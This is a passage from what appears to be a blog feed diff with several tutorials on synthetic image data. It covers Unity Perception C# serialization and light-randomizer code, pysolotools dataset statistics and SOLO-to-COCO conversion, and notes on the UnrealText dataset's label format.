    builder.ToJson()
    );
    }

    public void AnnotationRegistered(AnnotationDefinition annotationDefinition)
    {
//// Using Method 2 (IMessageProducer Serialization)

// 1. Create a new JsonMessageBuilder class
    var builder = GetNewJsonMessageBuilder();

    // 2. Allow the annotation definition to convert itself to a message and add it to our builder
    annotationDefinition.ToMessage(builder);

// Invariant: The builder now contains a representation of the annotation definition class
// 3. We can use the ToJson function in the builder to write that representation to JSON
    PathUtils.WriteAndReportJsonFile(
    Path.Combine(currentPath, $"annotation-definition-{annotationDefinition.id}.json"),
    builder.ToJson()
    );
    }

    public void MetricRegistered(MetricDefinition metricDefinition)
    {
    // Using Method 2 (IMessageProducer Serialization)

    // Similar to SensorDefinition, MetricDefinition also inherits from IMessageProducer so it can tell the builder how it should be serialized.
    var builder = GetNewJsonMessageBuilder();
    metricDefinition.ToMessage(builder);
    PathUtils.WriteAndReportJsonFile(
    Path.Combine(currentPath, $"annotation-definition-{metricDefinition.id}.json"),
    builder.ToJson()
    );
    }

    public void FrameGenerated(Frame frame)
    {
    // Using Method 2 (IMessageProducer Serialization)

    // By default, the JsonMessageBuilder class does not know how to process image files referenced in the
    // Frame class. So we need to make a new FlatFrameMessageBuilder that inherits from JsonMessageBuilder
    // and specify how to handle image files. We can conveniently use the ToMessage function of the Frame
    // class and pass in our new FlatFrameMessageBuilder class.
    var builder = new FlatFrameMessageBuilder(this, frame);
    frame.ToMessage(builder);

    PathUtils.WriteAndReportJsonFile(
    Path.Combine(currentPath, $"frame-{frame.id}.json"),
    builder.ToJson()
    );
    }

    public void SimulationCompleted(SimulationMetadata metadata)
    {
    // Using Method 2 (IMessageProducer Serialization)

    // 1. Create a new JsonMessageBuilder class
    var metadataBuilder = GetNewJsonMessageBuilder();

    // 2. Add metadata as a message into the metadataBuilder
    metadata.ToMessage(metadataBuilder);

    // 3. Write the metadata parameter to {currentPath}/metadata.json
    PathUtils.WriteAndReportJsonFile(
    Path.Combine(currentPath, "metadata.json"),
    metadataBuilder.ToJson()
    );

    //// Using Method 1 (Custom Serialization)

    // 1. Create a new JsonMessageBuilder class
    var completeBuilder = GetNewJsonMessageBuilder();
    var simulationEndTime = DateTimeOffset.Now;
    var simulationDuration = simulationEndTime - m_SimulationStartTime;

    // 2. Add all relevant key-value pairs
    completeBuilder.AddLong("start_timestamp", m_SimulationStartTime.ToUnixTimeMilliseconds());
    completeBuilder.AddLong("end_timestamp", m_SimulationStartTime.ToUnixTimeMilliseconds());
    completeBuilder.AddDouble("duration_seconds", simulationDuration.TotalSeconds);

    // 3. Convert data to json and write to file
    PathUtils.WriteAndReportJsonFile(
    Path.Combine(currentPath, "simulation-complete.json"),
    completeBuilder.ToJson()
    );
    }

/// <summary>
/// Placeholder for crash resumption logic.
/// </summary>
/// <remarks>Unsupported for FlatEndpoint</remarks>
    public (string, int) ResumeSimulationFromCrash(int maxFrameCount)
    {
    Debug.LogError("Crash resumption not supported for FlatEndpoint output.");
    return (string.Empty, 0);
    }

    public object Clone()
    {
    return new FlatEndpoint();
    }

    #endregion
    }

    /// <summary>
    /// A MessageBuilder that extends JsonMessageBuilder to add support for serializing images and tensors.
    /// </summary>
    class FlatFrameMessageBuilder : JsonMessageBuilder
    {
    Frame m_Frame;
    FlatEndpoint m_Endpoint;

    public FlatFrameMessageBuilder(FlatEndpoint endpoint, Frame frame)
    {
    m_Endpoint = endpoint;
    m_Frame = frame;
    }

    /// <summary>
    /// Write out the byte array as an image and append sequence and step number to the key to construct the final file-name.
    /// </summary>
    public override void AddEncodedImage(string key, string extension, byte[] value)
    {
    if (value.Length > 0)
    {
    var filename = $"{key}_{m_Frame.sequence}-{m_Frame.step}.{extension.ToLower()}";
    // write out the file
    PathUtils.WriteAndReportImageFile(
    Path.Combine(m_Endpoint.currentPath, filename),
    value
    );
    }
    }

    /// <summary>
    /// A nested message adds the output of an IMessageBuilder to a specific key.
    /// </summary>
    public override IMessageBuilder AddNestedMessage(string key)
    {
    var nested = new FlatFrameMessageBuilder(m_Endpoint, m_Frame);
    if (nestedValue.ContainsKey(key))
    {
    Debug.LogWarning($"Report data with key [{key}] will be overridden by new values");
    }

    nestedValue[key] = nested;
    return nested;
    }

    /// <summary>
    /// Adds the output of an IMessageBuilder as an element of an array identified by the key <see cref="arraykey"/>.
    /// </summary>
    public override IMessageBuilder AddNestedMessageToVector(string arraykey)
    {
    if (!nestedArrays.TryGetValue(arraykey, out var nestedList))
    {
    nestedList = new List<JsonMessageBuilder>();
    nestedArrays[arraykey] = nestedList;
    }
    var nested = new FlatFrameMessageBuilder(m_Endpoint, m_Frame);
    nestedList.Add(nested);
    return nested;
    }

    // A tensor is a multi-dimensional array
    public override void AddTensor(string key, Tensor tensor)
    {
    // By default, write the tensor as a flattened array
    currentJToken[key] = new JArray(tensor.buffer);
    }
    }
    }

    Metadata Labeler

    ]]>
@@ -6487,7 +6487,7 @@ /posts/Python-%E5%A4%84%E7%90%86%20SOLO%20%E6%95%B0%E6%8D%AE%E9%9B%86/ - Main text

    Pysolotools Overview

Set up the environment:

    conda create -n pysolotools_env python=3.8
    conda activate pysolotools_env
    pip install pysolotools -i https://pypi.tuna.tsinghua.edu.cn/simple
    pip install jupyter

Download the repository from Unity-Technologies/pysolotools: Python toolchain for SOLO. (github.com), change to that directory in cmd, and launch Jupyter Notebook:

    jupyter notebook

Open examples/SOLO_Statistics.ipynb

    png

Set data_dir_path to the path of the synthesized dataset, and run it!


    import matplotlib.patches as mpatches
    import matplotlib.pyplot as plt
    import numpy as np
    import pandas as pd
    import seaborn as sns
    from pysolotools.consumers.solo import Solo
    from pysolotools.stats.analyzers.image_analysis_analyzer import (
    LaplacianStatsAnalyzer,
    PowerSpectrumStatsAnalyzer,
    WaveletTransformStatsAnalyzer,
    )
    from pysolotools.stats.analyzers.bbox_analyzer import (
    BBoxHeatMapStatsAnalyzer,
    BBoxSizeStatsAnalyzer,
    BBoxCountStatsAnalyzer
    )
    from pysolotools.stats.handler import StatsHandler

    Initialize SOLO object

    data_dir_path = r"XXXX"
    solo = Solo(data_dir_path)

    Object Detection Stats

• The BBoxCountStatsAnalyzer class analyzes the number of bounding boxes in the detection results. It takes a Solo object as its parameter; that object holds all the detection results, i.e. a series of detected bounding-box regions. Through the bbox_count_analyzer object you can obtain count statistics for the bounding boxes, such as the minimum, maximum, mean, and variance.
• The BBoxSizeStatsAnalyzer class analyzes the size distribution of the bounding boxes in the detection results. It takes no parameters and works with any dataset that contains bounding-box information. Through the bbox_size_analyzer object you can obtain size statistics for the bounding boxes, such as the minimum, maximum, mean, and variance.
• The BBoxHeatMapStatsAnalyzer class generates a heatmap of the bounding boxes in the detection results. It also takes no parameters and works with any dataset that contains bounding-box information. Through the bbox_hmap_analyzer object you can map the positions of the bounding boxes onto an image and visualize their density distribution.
    bbox_count_analyzer = BBoxCountStatsAnalyzer(solo)
    bbox_size_analyzer = BBoxSizeStatsAnalyzer()
    bbox_hmap_analyzer = BBoxHeatMapStatsAnalyzer()
• The StatsHandler class takes a Solo object containing the statistics as its parameter and provides a handle method for processing a list of analyzers. In this example, the StatsHandler is constructed with solo, i.e. the object-detection dataset, and handle takes a list of analyzer objects: bbox_count_analyzer, bbox_hmap_analyzer, and bbox_size_analyzer.
• The handle method returns a result object that stores the statistics of the three analyzers. For example, bbox_count_analyzer outputs the maximum, minimum, and mean bounding-box counts; bbox_hmap_analyzer outputs the bounding-box density heatmap data; and bbox_size_analyzer outputs bounding-box size statistics. result is the collection of all these statistics.
# Run the three analyzers defined above through the StatsHandler and return the results.
    stats_handler = StatsHandler(solo)
    result = stats_handler.handle([bbox_count_analyzer, bbox_hmap_analyzer, bbox_size_analyzer])

    SOLO Metadata

    print(f'Total Sequences: {solo.metadata.totalSequences}')
    print(f'Total Frames: {solo.metadata.totalFrames}')
    print(f'Frames Per Sequence: {solo.metadata.totalFrames / solo.metadata.totalSequences}')
Total Sequences: 100
Total Frames: 100
Frames Per Sequence: 1.0

    Categories in Dataset

    categories = solo.categories()
    categories_df = pd.DataFrame.from_dict(categories, orient="index")
    categories_df.columns = ['Label']
    categories_df
    Label
    1 drink_whippingcream_lucerne
    2 lotion_essentially_nivea
    3 craft_yarn_caron_01
    4 cereal_cheerios_honeynut
    5 candy_minipralines_lindt
    6 pasta_lasagne_barilla
    7 drink_greentea_itoen
    8 snack_granolabar_naturevalley
    9 snack_biscotti_ghiott_01
    10 cleaning_snuggle_henkel
Objects in Dataset

This code takes the bbox_counts result object produced by the statistics tools above and visualizes the distribution of bounding-box counts across the dataset:

# Get the result object bbox_counts produced by BBoxCountStatsAnalyzer
bbox_counts = result["BBoxCountStatsAnalyzer"]
# Get the total number of bounding boxes in the dataset
print(f'Total count of objects in dataset: {bbox_counts.get_total_count()}')

# Use frame_list as the list of frames to display, to get the per-frame bounding-box counts
# Visualizing every frame would be unwieldy, so only frames 2-20 are shown here
    end = min(20, solo.metadata.totalFrames)
    frame_list = list(range(2, end))

    frame_counts = bbox_counts.get_count_per_frame(frame_list)

    x, y = frame_counts.keys(), frame_counts.values()
    fig, ax = plt.subplots(1, 1)
    ax.bar(x, y, width=1)
    ax.set_xlim(2, end)
    plt.xticks(frame_list)
    print("\nObjects Per Frame:")
    plt.show()

Total count of objects in dataset: 625
Objects Per Frame:

    png

The next chart shows how many instances of a specific object appear in each frame; in this case we are looking for the "cereal_cheerios_honeynut" label class.

Something must have gone wrong somewhere when this dataset was generated; hmm, nothing shows up.

    k = list(categories.keys())
    frame_counts = bbox_counts.get_count_per_frame(frame_list, [k[0]])
    x, y = frame_counts.keys(), frame_counts.values()
    fig, ax = plt.subplots(1, 1)
    ax.bar(x, y, width=1)
    ax.set_xlim(2, end)
    plt.xticks(frame_list)
    print(f"\n{categories[k[0]]} Per Frame:")
    plt.show()
    cereal_cheerios_honeynut Per Frame:

    png

    BBox Heatmap

This code takes the bbox_heatmap result object produced by the statistics tools above and visualizes the bounding-box heatmap. bbox_heatmap_norm maps the raw data into the 0-1 range to make it easier to visualize.

# Get the result object bbox_heatmap produced by BBoxHeatMapStatsAnalyzer
bbox_heatmap = result["BBoxHeatMapStatsAnalyzer"]
# Normalize the raw data into the 0-1 range
bbox_heatmap_norm = bbox_heatmap / bbox_heatmap.max()
# Visualize bbox_heatmap as a heatmap using Matplotlib's imshow()
# The cmap parameter selects the colormap; the "plasma" scheme is used here
    fig, ax = plt.subplots(dpi=100, figsize=(8,8))
    pcm = ax.imshow(bbox_heatmap_norm[:,:,0], cmap="plasma", )
    plt.show()

This code uses the statistics stored in the bbox_heatmap object to visualize the density distribution of the bounding boxes. This visualization helps users better understand how densely the detection targets are distributed across the dataset.

    png

    Bounding Box Size Distribution

# Get the result object bbox_size_dist produced by BBoxSizeStatsAnalyzer
bbox_size_dist = result["BBoxSizeStatsAnalyzer"]
# Build a 2D list bbox_size: each element holds a bounding box's size,
# the dataset type "Synth", and a weight equal to that size's share of the total
bbox_size = [[x, "Synth", 1/len(bbox_size_dist)] for x in bbox_size_dist]
# Convert bbox_size into a pandas DataFrame with named columns
df = pd.DataFrame(bbox_size, columns =['val', 'type', 'w'])

# Draw the histogram with seaborn's histplot()
    fig, ax = plt.subplots(dpi=80, figsize=(10,6))
    sns.histplot(data=df, x="val", hue="type", weights='w',
    bins=50, multiple="layer", alpha=.85, ax=ax, legend=None)

    # where some data has already been plotted to ax
    handles, labels = ax.get_legend_handles_labels()

    # manually define a new patch
    colors = plt.rcParams['axes.prop_cycle'].by_key()['color']
    patch1 = mpatches.Patch(color=colors[0], label='Synth')
    handles.append(patch1)

    plt.legend(handles=handles, fontsize=18)

# Manually define a new legend to replace the original one
    ax.set_xlabel("Bouding Box's relative size in an image", fontsize=18)
    ax.set_ylabel("Bouding Box Probability", fontsize=18)
    ax.yaxis.set_tick_params(labelsize=18)
    ax.xaxis.set_tick_params(labelsize=18)

    fig.tight_layout()

    plt.show()

    png

    Initialize Analyzers and Handler

This code runs three different image-analysis tools over the images and passes their results to the StatsHandler for unified processing. This gives users a fuller picture of the images' intrinsic characteristics.

# Run Laplacian analysis on the solo images and store the result in laplacian_analyzer
laplacian_analyzer = LaplacianStatsAnalyzer(solo)
# Run power-spectral-density analysis on the solo images to get their frequency content, stored in psd_analyzer
psd_analyzer = PowerSpectrumStatsAnalyzer(solo)
# Run wavelet-transform analysis on the solo images to get the transform coefficients, stored in wavelet_analyzer
wavelet_analyzer = WaveletTransformStatsAnalyzer(solo)

    stats_handler = StatsHandler(solo)
    result = stats_handler.handle([laplacian_analyzer, psd_analyzer, wavelet_analyzer])

    Image Analysis Stats

    bbox_var = result["LaplacianStatsAnalyzer"]["bbox_var"]
    img_var = result["LaplacianStatsAnalyzer"]["img_var"]

    Laplacian

# Create a figure window fig with a single subplot and its Axes object ax using plt.subplots()
    fig, ax = plt.subplots(dpi=80, figsize=(10,6))

# Draw a box plot with ax.boxplot(), where:
# bbox_var is the data to plot,
# vert=0 lays the box out horizontally,
# patch_artist=True fills the box with color,
# labels=["Synth"] sets the axis label,
# showmeans=True shows the mean,
# meanline=True draws the mean as a line,
# showfliers=False hides outliers
    box = ax.boxplot(bbox_var,vert=0,patch_artist=True,labels=["Synth"],
    showmeans=True, meanline=True, showfliers=False,)

# Get the default palette's color list via plt.rcParams['axes.prop_cycle'].by_key()['color'] and set the first box's fill color and opacity
    colors = plt.rcParams['axes.prop_cycle'].by_key()['color']
    box['boxes'][0].set_facecolor(colors[1])
    box['boxes'][0].set_alpha(0.50)

# Manually restyle the mean line, median line, annotation text, etc., using methods such as box['medians'][0].set_color() and box['means'][0].set_color()
    box['medians'][0].set_color('black')
    box['means'][0].set_color('black')
    x, y = box['means'][0].get_xydata()[1]
    mean = np.array(bbox_var).mean()
    text = ' μ={:.2f}'.format(mean)
    ax.annotate(text, xy=(x, y+0.05), fontsize=15)

    plt.plot([], [], '--', linewidth=1, color='black', label='Mean')
    plt.plot([], [], '-', linewidth=1, color='black', label='Median')

# Add a legend with plt.legend(), and set tick sizes, axis labels, scales, and other properties
    plt.legend(fontsize=15, loc="upper left")

    plt.xticks(fontsize=15 )
    plt.yticks(fontsize=15 )
    plt.xscale('log')
    plt.xlabel(f"Var of Laplacian of Background in log scale", fontsize=18)
    plt.ylabel("Dataset", fontsize=15)

    plt.show()

    png

    Wavelet

This code applies a wavelet transform to the images, builds histograms of the cH coefficients in the horizontal and vertical directions, and plots the two histograms in the same chart.

    hist_list = []
    for coeff_type in ["horizontal", "vertical", "diagonal"]:
    coeff = result["WaveletTransformStatsAnalyzer"][coeff_type]
    hist = plt.hist(coeff, bins=np.logspace(np.log10(max([min(coeff), np.finfo(float).eps])), np.log10(max(coeff))))
    hist_list.append(hist)
    plt.close()

    fig, ax = plt.subplots(dpi=80, figsize=(10,6))
    colors = iter(plt.rcParams['axes.prop_cycle'].by_key()['color'])
    for hist, hist_type in zip(hist_list, ["horizontal", "vertical",]):
    norm_data = (hist[0] - min(hist[0]))/(max(hist[0])-min(hist[0]))
    ax.plot(hist[1][1:],norm_data, linestyle='-', label=hist_type, linewidth=3, color=next(colors))

    ax.set_xscale('log')

    plt.legend(loc="upper right", fontsize=15)
    plt.xlabel("Var of cH in Log Scale", fontsize=18)
    plt.ylabel("Density", fontsize=18)
    plt.xticks(fontsize=18)
    plt.yticks(fontsize=18)

    plt.setp(ax.spines.values(), linewidth=2.5)

    plt.show()

    png

    Power Spectrum

This code computes the one-dimensional power spectral density of the images and visualizes their frequency-domain characteristics. By inspecting the PSD curve, users can see the relative weight of different frequency components in the images and how energy is distributed across frequency ranges.

    psd_1d = np.nanmean(result["PowerSpectrumStatsAnalyzer"], axis=0)

    fig, ax = plt.subplots(dpi=100)
    colors = (plt.rcParams['axes.prop_cycle'].by_key()['color'])
    ax.plot(psd_1d, color=colors[1], label="PSD")

    plt.legend(fontsize=12)
    ax.set_xscale('log')
    ax.set_yscale('log')
    plt.ylabel("P(k)", fontsize=15)
    plt.xlabel("k", fontsize=15)
    plt.title("1D PSD")
    plt.xlim([1, None])
    plt.show()

    png

    Visualizing SOLO Datasets with Voxel51 and Pysolotools

Install OpenEXR (extremely hard to install) and pysolotools-fiftyone:

    conda activate pysolotools_env
    conda install -c conda-forge openexr-python
    pip install openexr
    pip install pysolotools-fiftyone

Run it!

Put the generated dataset in a folder whose path contains no spaces: D:\Study\1st-year-master\Datasets\solo_11

Type in the terminal:

    pysolotools-fiftyone D:\Study\1st-year-master\Datasets\solo_11

    jpg

    Using Pysolotools to Convert From SOLO to COCO

This guide walks you through the process of converting a dataset from the SOLO format to the COCO format. We will use pysolotools from Unity's computer vision team for this task. Pysolotools is a Python package that provides various tools for processing, analyzing, and converting SOLO datasets generated with the Perception package.

    solo2coco <SOLO_PATH> <COCO_PATH>

This tool seems to be quite resource-hungry; close everything you can, or it is likely to crash. Afterwards you get a COCO-format dataset:

    jpg

    ]]>
@@ -6514,7 +6514,7 @@ /posts/Unity-Perception%20Synthetic%20Data-2/ - Main text

In Phase 1 of the tutorial, we learned how to use the Randomizers bundled with the Perception package. Using the included Randomizers, we spawned background and foreground objects and randomized their position, rotation, texture, and hue offset (color). In this phase, we will build a custom light randomizer for the Directional Light object, which will control the light's intensity and color on each iteration of the Scenario. We will also learn how to bundle data and logic inside randomized objects (such as lights) in order to define and constrain random behavior more explicitly on a per-object basis.

    Building a Light Randomizer

We need to create two C# classes for light randomization, MyLightRandomizer and MyLightRandomizerTag (kept in a single .cs file).

The first class, MyLightRandomizer, samples random values and assigns them to the light's intensity and color.

The second class, MyLightRandomizerTag, is a component we add to the Directional Light to make it a target of the MyLightRandomizer script.

​ In the Assets folder, choose Create → Perception → C# Randomizer and RandomizerTag. This creates a new .cs file; name it MyLightRandomizerTag.cs. Open it and modify the code as follows:

    using System;
    using UnityEngine;
    using UnityEngine.Perception.Randomization.Parameters;
    using UnityEngine.Perception.Randomization.Randomizers;
    using UnityEngine.Perception.Randomization.Samplers;

    // Can only attach to GameObjects which also have a Light component attached
    [RequireComponent(typeof(Light))]
    // This tag is used to "target" which objects in the scene will be randomized
    public class MyLightRandomizerTag : RandomizerTag { }

    [Serializable]
// MyLightRandomizer is a Randomizer class that randomizes object properties at runtime.
// The [AddRandomizerMenu("MyLightRandomizer")] attribute registers it in the Perception randomizer menu.
    [AddRandomizerMenu("MyLightRandomizer")]
    public class MyLightRandomizer : Randomizer
    {
// lightIntensity is a FloatParameter that represents the light intensity during randomization.
// Its distribution is controlled by a UniformSampler; the default below samples uniformly
// from 0 to 1 (the range can be changed in the Inspector).
    public FloatParameter lightIntensity = new() { value = new UniformSampler(0, 1) };

    // Run this every randomization iteration
    protected override void OnIterationStart()
    {
    // Get all MyLightRandomizerTag's in the scene
    var tags = tagManager.Query<MyLightRandomizerTag>();
    foreach (var tag in tags)
    {
    // Get the light attached to the object
    var tagLight = tag.GetComponent<Light>();
// Set its intensity to a value freshly sampled from lightIntensity
    tagLight.intensity = lightIntensity.Sample();
    }
    }
    }

​ Add a new Randomizer, MyLightRandomizer, to the SimulationScenario and set its Range to (0.5, 3).

    png

​ Add the My Light Randomizer Tag component to the Directional Light.

    png

One more thing remains so that our directional light is the only light source in the scene and we can clearly see the effect of our work. By default, HDRP uses ambient lighting. To disable it:

​ On the object to which the Motion Blur component was previously attached, make sure Intensity = 0. Add a new Visual Environment component, tick Sky type, and set it to None.

    png

​ Run it!

    png

Now let's add more variation by randomizing the light's color.

​ Action: go back to MyLightRandomizerTag.cs and define a new ColorRgbParameter variable inside the MyLightRandomizer class:

    public ColorRgbParameter color;

​ Inside the loop over tags, add:

    tagLight.color = color.Sample();

    png

If you now check MyLightRandomizer's UI snippet, you will notice a new parameter named Color has been added. This parameter includes four separately randomized values for Red, Green, Blue, and Alpha. Note that the valid range for all of these values is 0-1 (not 0-255). You can see that the sampling range for red, green, and blue is currently set to 0-1, which means the parameter covers the entire color gamut. A color with RGB components of (0, 0, 0) emits essentially no light, so let's raise the minimums a little to avoid that.

​ Set the minimum values for the light color to 0.4:

    png

​ Run it and watch the color change:

    png

    Bundle Data and Logic Inside RandomizerTags

You may sometimes need to bundle certain randomization-related data or logic into the objects themselves, when that data or logic is intrinsic to the object. For example, a Scene may contain several lights, but you may want each light to have its own unique intensity range. Adding a new Parameter to the light randomizer for each light just to achieve this would be tedious. Moreover, it would over-specialize your light randomizer for one use case and limit its reusability.

In some cases you may also want to include certain logic within the object, to make the randomizer code easier to reuse and maintain. For example, you might want to build an office chair prefab for use in a variety of simulations. The chair might support a range of customizations of its parts (back angle, seat angle, seat height, and so on). Instead of mapping a rotation parameter from a randomizer directly onto the rotation of the backrest object inside the chair, it is better to have the chair expose the possible angle range as a simple float between 0 and 1. With this approach, the randomizer only needs to sample a float parameter and assign it to the chair. In turn, the chair carries a script that knows how to map this single float to a sensible back angle. You could even map this float to a more complex state of the chair, and your randomizer would still need only one float parameter.

​ Select the Directional Light object and press Ctrl+D to duplicate it into a new object, Directional Light (1). Set the Y rotation of Directional Light to 60 and the Y rotation of Directional Light (1) to -60.

    png

This makes the two lights illuminate the scene from opposite angles. Note that the position of Directional Lights in Unity does not affect how they light the scene; only their rotation does.

​ Modify the MyLightRandomizerTag class in MyLightRandomizerTag.cs:

    public class MyLightRandomizerTag : RandomizerTag {
public float minIntensity; // minimum light intensity
public float maxIntensity; // maximum light intensity

    public void SetIntensity(float rawIntensity)
    {
    var tagLight = GetComponent<Light>();
// Scale the raw intensity (assumed to be in [0, 1]) into the [minIntensity, maxIntensity] range
var scaledIntensity = rawIntensity * (maxIntensity - minIntensity) + minIntensity;
// Use the scaled value to set the intensity of the Light component attached to this GameObject
    tagLight.intensity = scaledIntensity;
    }
    }

In the code above, we created a new SetIntensity function that first scales the incoming intensity (assumed to be between 0 and 1) into our desired range and then assigns it to the light's intensity. The Light component is now retrieved from the GameObject this RandomizerTag is attached to. This works because the tag component and the Light component are attached to the same object in the scene (one of the directional lights we created).

The component has been added to both of our lights. We now need to set the desired minimum and maximum intensities, which can be done through the Inspector view.

    png

​ Open MyLightRandomizerTag.cs and modify the foreach loop in the Randomizer class:

    var tags = tagManager.Query<MyLightRandomizerTag>();
    foreach (var tag in tags)
    {
    // Get the light attached to the object
    var tagLight = tag.GetComponent<Light>();
    tagLight.color = color.Sample();
    // Call the SetIntensity function we defined in the tag instead!
    tag.SetIntensity(lightIntensity.Sample());
    }

​ Run it!

    png

We have learned how to:

1. Download the Unity Editor and install the Perception package
2. Set up a scene with a Scenario and Randomizers to generate synthetic data
3. Randomize the simulation using the Randomizers that ship with Perception
4. Create custom Randomizers in C# for more complex or specific randomization needs

The complete code of MyLightRandomizerTag.cs:

    using System;
    using UnityEngine;
    using UnityEngine.Perception.Randomization.Parameters;
    using UnityEngine.Perception.Randomization.Randomizers;
    using UnityEngine.Perception.Randomization.Samplers;

    // Can only attach to GameObjects which also have a Light component attached
    [RequireComponent(typeof(Light))]
    // This tag is used to "target" which objects in the scene will be randomized
    public class MyLightRandomizerTag : RandomizerTag
    {
public float minIntensity; // minimum light intensity
public float maxIntensity; // maximum light intensity

    public void SetIntensity(float rawIntensity)
    {
    var tagLight = GetComponent<Light>();
// Scale the raw intensity (assumed to be in [0, 1]) into the [minIntensity, maxIntensity] range
var scaledIntensity = rawIntensity * (maxIntensity - minIntensity) + minIntensity;
// Use the scaled value to set the intensity of the Light component attached to this GameObject
    tagLight.intensity = scaledIntensity;
    }
    }

    [Serializable]
// MyLightRandomizer is a Randomizer class that randomizes object properties at runtime.
// The [AddRandomizerMenu("MyLightRandomizer")] attribute registers it in the Perception randomizer menu.
    [AddRandomizerMenu("MyLightRandomizer")]
    public class MyLightRandomizer : Randomizer
    {
// lightIntensity is a FloatParameter that represents the light intensity during randomization.
// Its distribution is controlled by a UniformSampler; the default below samples uniformly
// from 0 to 1 (the range can be changed in the Inspector).
    public FloatParameter lightIntensity = new() { value = new UniformSampler(0, 1) };
    public ColorRgbParameter color;

    // Run this every randomization iteration
    protected override void OnIterationStart()
    {
    // Get all MyLightRandomizerTag's in the scene
    var tags = tagManager.Query<MyLightRandomizerTag>();
    foreach (var tag in tags)
    {
    // Get the light attached to the object
    var tagLight = tag.GetComponent<Light>();
    tagLight.color = color.Sample();
    // Call the SetIntensity function we defined in the tag instead!
    tag.SetIntensity(lightIntensity.Sample());
    }
    }
    }
    ]]>
@@ -6572,7 +6572,7 @@ /posts/Paper-UnrealText-Synthesizing%20Realistic%20Scene%20Text%20Images%20from%20the%20Unreal%20World/ - Resources

Paper

Code

Official site

Datasets

Languages        Num of Images    Num of Text    Baidu Drive                Google Drive
English/Latin    728K             ~20M           Link (password: 2h8d)      Link
Multilingual     674K             ~18M           Link (password: tddl)      Link

The Multilingual version covers 10 languages: Arabic, English, French, Chinese, German, Korean, Japanese, Italian, Bengali, and Hindi.

The two datasets together are about 150 GB, so they are split into roughly 130 archives, organized as follows:

    ./
    +---sub_0
    +---imgs
    | 0.jpg
    | 1.jpg
    | ...
    |
    +---labels
    | 0.json
    | 1.json
    | ...
    |
    +---sub_1
    +---sub_2
    +---sub_3
    ...
    +---sub_100
    ...

Labels are stored in the following format:

{
    "imgfile": str, path to the corresponding image file, e.g. "imgs/0.jpg",
    "bbox": List[
        word_i (8 floats): [x0, y0, x1, y1, x2, y2, x3, y3]
        (from upper left corner, clockwise),
    ],
    "cbox": List[
        char_i (8 floats): [x0, y0, x1, y1, x2, y2, x3, y3]
        (from upper left corner, clockwise),
    ],
    "text": List[str]
}
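
As a quick sanity check of this layout, a minimal loader sketch (the shard path UnrealText/sub_0 is an assumption for illustration):

import json
from pathlib import Path

# Hypothetical local path to one extracted shard of UnrealText.
shard = Path("UnrealText/sub_0")

for label_file in sorted((shard / "labels").glob("*.json")):
    with open(label_file, "r", encoding="utf-8") as f:
        label = json.load(f)
    image_path = shard / label["imgfile"]   # e.g. sub_0/imgs/0.jpg
    words = label["text"]                   # one transcription per word box
    boxes = label["bbox"]                   # 8 floats per word, clockwise from the upper left
    assert len(words) == len(boxes)
    print(image_path.name, len(words), "words")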

Example:

    {
    "imgfile": "imgs/54.jpg",
    "bbox": [[478, 188, 526, 234, 526, 248, 477, 203], [479, 223, 527, 265, 526, 281, 477, 239], [474, 251, 527, 295, 527, 307, 473, 264],

    ......

    , [590, 532, 781, 492, 799, 547, 598, 579], [809, 489, 844, 482, 860, 524, 823, 530], [214, 652, 274, 644, 267, 674, 207, 679]],
    "cbox": [[478, 188, 526, 234, 526, 248, 477, 203], [479, 223, 527, 265, 526, 281, 477, 239], [474, 251, 527, 295, 527, 307, 473, 264],

    ......

    , [236, 437, 291, 457, 286, 475, 229, 456], [222, 476, 274, 492, 268, 514, 214, 500], [457, 560, 572, 536, 578, 573, 459, 593], [590, 532, 781, 492, 799, 547, 598, 579], [809, 489, 844, 482, 860, 524, 823, 530], [214, 652, 274, 644, 267, 674, 207, 679]],
    "text": ["\"process", "Caloger", "billowin", "746", "Sasc", "(Twitter", "AlHarth", "corporation", "Val", "MARKET", "habits", "He", "\u201cT", "(tr", "hu", "180", "Dr", "Ch", "sic", "Ab", "Fo", "in", "Temes,", "Ar", "F3D2Ms)", "Viaduct\"", "\u2018An", "dracae", "\u00d8land", "\"Dev", "throwback", "locus", "GB)", "Central\u2013St", "USHL/NH", "touc", "Sele", "flat", "tsao", "Novn", "Eckh", "French", "Melapia", "E", "floor"],
    "is_difficult": [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
    }


    {
    "imgfile": "imgs/15.jpg",
    "bbox": [[772, 225, 807, 221, 806, 233, 771, 237], [811, 217, 888, 207, 886, 228, 810, 236],

    ......

    , [815, 301, 857, 303, 855, 314, 814, 311], [862, 304, 894, 305, 891, 316, 860, 314], [900, 306, 931, 307, 927, 322, 897, 319]],
    "cbox": [[772, 226, 773, 226, 773, 236, 771, 237], [774, 226, 779, 225, 778, 234, 773, 235],

    ......

    , [892, 309, 893, 309, 891, 316, 890, 316], [900, 306, 912, 306, 909, 318, 897, 317], [913, 306, 922, 307, 919, 318, 910, 318], [922, 311, 928, 311, 925, 321, 920, 320], [927, 320, 928, 320, 927, 322, 926, 322]],
    "text": ["[Mondial]", "\u092d\u0942\u0935\u093f\u091c\u094d\u091e\u093e\u0928\u0940\u0913\u0901", "\u0926\u0928\u093f\u092f\u093e\u0932", "1011)",

    ......

    , "31,438", "6/8/2006", "\u0646\u0628\u064a\u0644", "\u0646\u0627\u0637\u0642\u062a\u0627\u0646", "\u0645\u0647", "\u092e\u0948\u091f\u0930\u0928\u093f\u0916", "\u0935\u093f\u091a\u0947\u091c", "\u091b\u093f\u091c\u093c"],
    "is_difficult": [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
    }

My impression: the pipeline handles lighting and perspective to some extent, but does not adapt well to the surface textures of the models. Non-Latin text is handled via Unicode character encoding.

Visualization

I wrote some code to visualize the dataset, and the bbox and cbox fields look completely identical? (In some datasets, bbox splits text by line while cbox splits it by character.) See the quick check after the script below.

import cv2
import os
import matplotlib.pyplot as plt
import json
import numpy as np

index = 93

image_dir = r'E:\dataset\UnrealText\sub_103\imgs'
label_dir = r'E:\dataset\UnrealText\sub_103\labels'

image_path = os.path.join(image_dir, str(index) + '.jpg')
label_path = os.path.join(label_dir, str(index) + '.json')

